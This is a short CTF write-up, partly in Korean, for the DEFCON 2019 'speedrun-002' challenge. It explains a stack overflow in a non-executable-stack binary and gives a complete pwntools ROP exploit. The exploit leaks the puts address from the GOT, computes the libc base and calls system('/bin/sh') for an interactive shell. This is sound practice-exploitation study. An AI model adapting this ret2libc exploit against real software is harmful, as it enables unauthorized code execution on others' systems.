DEFCON 2019 Speedrun-002

How to Solve

1. IDA : 처음에 Everything intelligent is so boring. 입력해야 한다. buf의 크기가 0x400인데, read 함수에서 2010만큼 입력을 받는다.
2. gdb speedrun-002, checksec : NX 걸림.
3. ROP 문제이다.

---

Design the Payload

puts(puts_got); // puts 주소 파악
system("/bin/sh", NULL, NULL);

Find the gadget : ROPgadget --binary speedrun-002 | grep

---

Exploit

from pwn import *
p=process('./speedrun-002')
e=ELF('./speedrun-002')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

puts_plt=e.plt['puts']
puts_got=e.got['puts']

pr=0x4008a3
ppr=0x4008a1
main=0x4007ce

puts_offset=libc.symbols['puts']
system_offset=libc.symbols['system']
binsh_offset=libc.search("/bin/sh").next()

payload="A"*0x400
payload+="B"*8
payload+=p64(pr)+p64(puts_got)
payload+=p64(puts_plt)
payload+=p64(main)

p.sendlineafter('?\n', "Everything intelligent is so boring.")
p.sendlineafter('more.\n', payload)

p.recvline()                    # 'Fascinating\n'
leak=u64(p.recvn(6)+'\x00'*2)
libc_base=leak-puts_offset
system=libc_base+system_offset
binsh=libc_base+binsh_offset

payload="A"*0x400
payload+="B"*8
payload+=p64(pr)+p64(binsh)
payload+=p64(ppr)+p64(0)+p64(0)
payload+=p64(system)

p.sendlineafter('?\n', "Everything intelligent is so boring.")
p.sendlineafter('more.\n', payload)

p.interactive()

---

Get The Shell

---